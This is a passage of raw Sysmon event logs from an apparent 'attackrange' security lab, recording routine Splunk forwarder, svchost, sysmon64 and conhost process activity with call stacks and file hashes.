Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981200Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.731{69CF5F33-8D8F-6151-177A-00000000FD01}3660C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000981199Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.059{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D8F-6151-167A-00000000FD01}2472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000981198Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.059{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EED08AA52E1FF34DA97E3E12870BE86F,SHA256=5C3A9267F524C1186A8A29019203D0EBCA30C0AC78D1C607D29C8E9B54E08736,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981197Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.059{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981196Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.059{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981195Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.059{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981194Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.059{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981193Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.059{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981192Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.059{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981191Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.059{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981190Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.059{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981189Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.059{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981188Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.059{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8D8F-6151-167A-00000000FD01}2472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981187Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.059{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D8F-6151-167A-00000000FD01}2472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981186Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:27.044{69CF5F33-8D8F-6151-167A-00000000FD01}2472C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001056621Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:27.700{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84EC7C3D71EE75AA4F79CD0B4415F3FC,SHA256=DC6CED054663EB8A85A9B0C94E3C714DE0F315475C630C3A7CA109734075BBC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056620Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:27.700{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B8DE4BA92A7E773B7E02A06810DA3BC4,SHA256=BADF726E62F93B9F019D5E2CC4F2B69F1B969D9A02EF80EE9C39CA99E6A88774,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056625Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:28.794{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CEFE632214D200E94100A05807F42F3,SHA256=6C12CBCEA3A80DBDE9CF24484690B3A9FEB892CDD7A43D607BF2D7CE7A2444AE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981242Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.949{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D90-6151-197A-00000000FD01}3428C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981241Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.949{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981240Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.949{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981239Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.949{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981238Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.949{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981237Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.949{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981236Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.949{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981235Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.949{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981234Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.949{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981233Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:28.949{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL3